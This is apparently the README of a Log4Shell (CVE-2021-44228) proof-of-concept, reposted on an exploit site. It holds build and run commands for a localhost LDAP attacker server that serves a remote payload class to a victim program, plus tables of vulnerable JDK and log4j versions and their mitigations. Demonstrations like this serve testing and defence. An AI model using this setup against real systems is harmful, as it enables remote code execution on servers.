Share
## https://sploitus.com/exploit?id=371D4A15-51B5-520B-B31D-856E557695FD
# sample-ldap-exploit

A short demo of CVE-2021-44228 

## Build

~~~
$ mvn clean verify
~~~

## Run Attacker

~~~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
~~~

URLs:
- `http://localhost:8080/`
- `http://localhost:8080/sample/payload/Payload.class` 

## Run Victim

~~~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim
~~~

## Results

### JDK / JRE

| Version                          | Status                                                                     |
|----------------------------------|----------------------------------------------------------------------------|
| `Oracle JDK 8u5`                 | vulnerable                                                                 |
| `OpenJDK 8u312`                  | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `IBM OpenJDK 8u312-b07 (OpenJ9)` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.7+10`              | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.13+8`              | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 16+36`                  | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17+35`                  | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17.0.1+12`              | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |

If NOT vulnerable, an instance of `javax.naming.Reference` is returned from `javax.naming.Context.lookup()`.

If NOT vulnerable to loading classes from remote code bases,
other **Java deserialization vulnerabilities probably still exist**!

### log4j

| Version  | Status                                                                                                            |
|----------|-------------------------------------------------------------------------------------------------------------------|
| `2.9.1`  | vulnerable                                                                                                        |
| `2.10.0` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.14.1` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.15.0` | NOT vulnerable                                                                                                    |

If NOT vulnerable, `${jndi:ldap:...}` is NOT resolved.